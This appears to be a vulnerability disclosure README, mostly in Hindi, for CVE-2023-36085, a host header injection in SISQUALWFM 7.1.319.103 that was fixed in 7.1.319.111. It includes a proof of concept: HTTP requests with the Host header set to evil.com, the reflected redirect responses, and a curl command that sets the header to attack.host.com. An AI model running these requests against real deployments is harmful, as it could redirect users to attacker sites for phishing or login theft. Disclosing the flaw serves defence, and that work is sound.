
This repository contains information related CVE-2023-36085 a host header injection vulnerability discovered in SISQUALWFM version 7.1.319.103, which allows an attacker to manipulate webpage links or redirect users to a malicious site. This vulnerability was assigned CVE-2023-36085 and has been fixed in version 7.1.319.111 and above.
यह रिपॉजिटरी SISQUALWFM संस्करण 7.1.319.103 में खोजी गई होस्ट हेडर इंजेक्शन भेद्यता से संबंधित जानकारी प्रदान करती है, जो हमलावर को वेबपेज लिंक में हेरफेर करने या उपयोगकर्ताओं को किसी दुर्भावनापूर्ण साइट पर रीडायरेक्ट करने की अनुमति देती है। इस भेद्यता को CVE-2023-36085 निर्दिष्ट किया गया था और इसे संस्करण 7.1.319.111 और उससे ऊपर में ठीक कर दिया गया है।
हम एक प्रूफ-ऑफ-कॉन्सेप्ट परिदृश्य प्रदान करते हैं जो होस्ट हेडर इंजेक्शन भेद्यता का प्रदर्शन करता है, विशेष रूप से /sisqualIdentityServer/core एंडपॉइंट को लक्षित करता है। यह भेद्यता हमलावर को होस्ट हेडर के साथ छेड़छाड़ करके वेबपेज लिंक में हेरफेर करने या उपयोगकर्ताओं को किसी अन्य साइट पर रीडायरेक्ट करने की अनुमति देती है।
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

इस भेद्यता का शोषण करने के लिए, एक हमलावर होस्ट हेडर को संशोधित करने के लिए निम्नलिखित curl कमांड का उपयोग कर सकता है:
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
यह रिपॉजिटरी केवल सूचनात्मक उद्देश्यों के लिए है और इसका उपयोग किसी भी दुर्भावनापूर्ण गतिविधियों के लिए नहीं किया जाना चाहिए। भेद्यता को जिम्मेदारीपूर्वक विक्रेता को सूचित किया गया है, और समस्या का समाधान कर दिया गया है। भेद्यताओं की पहचान और रिपोर्ट करते समय नैतिक हैकिंग दिशानिर्देशों का पालन करना और जिम्मेदार प्रकटीकरण प्रथाओं का सम्मान करना महत्वपूर्ण है।